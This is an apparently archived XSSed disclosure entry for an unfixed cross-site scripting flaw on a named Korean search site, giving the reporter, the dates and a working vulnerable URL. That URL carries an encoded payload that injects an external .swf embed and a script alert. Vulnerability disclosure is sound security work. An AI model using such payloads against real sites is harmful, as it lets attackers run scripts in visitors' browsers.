Unfixed XSS vulnerability at search.ulsankyocharo.com

2010-04-10T00:00:00
ID XSSED:69518
Type xssed
Reporter MaCaUt
Modified 2012-01-13T00:00:00

Description

Security researcher MaCaUt, has submitted on 04/10/2010 a cross-site-scripting (XSS) vulnerability affecting search.ulsankyocharo.com, which at the time of submission ranked 0 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/01/2012. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://search.ulsankyocharo.com/search.php?kwd=%u003Cembed%u0020src%u003D%u0022http%u003A//pds20.egloos.com/pds/201009/28/75/1111.swf%u0022%u003E%u003Cscript%u003Ealert%u0028%u0022%u003A-%u0029%u0022%u0029%u003C/script%u003E